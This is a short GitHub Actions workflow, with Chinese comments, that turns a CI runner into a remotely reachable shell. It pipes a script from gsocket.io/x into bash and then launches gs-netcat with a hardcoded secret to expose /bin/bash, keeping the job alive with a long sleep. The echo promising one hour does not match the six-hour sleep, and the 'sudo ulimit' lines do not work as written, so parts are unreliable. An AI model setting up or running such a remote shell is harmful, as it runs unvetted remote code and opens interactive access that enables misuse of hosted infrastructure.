name: GSocket Linux Reverse Shell

on:
  workflow_dispatch:  # 手動觸發執行

jobs:
  reverse-shell:
    runs-on: ubuntu-latest

    steps:
      - name: Install gs-netcat from gsocket.io/x
        run: |
          curl -fsSL https://gsocket.io/x | bash
          sudo apt update -y
          sudo apt upgrade -y
          sudo apt install neofetch speedtest-cli python3 python3-pip -y #自己決定要先安裝啥
          sudo ulimit -u 999999
          sudo ulimit -e 999999
          sudo ulimit -n 999999

      - name: Start gsocket reverse shell (bash)
        run: |
          nohup ./gs-netcat -s jeikaizin1337 --exec /bin/bash > out.log 2>&1 & # 把 jeikaizin1337 改成你的密碼
          echo "GSocket shell started. You have 1 hour to connect..."
          sleep 21600
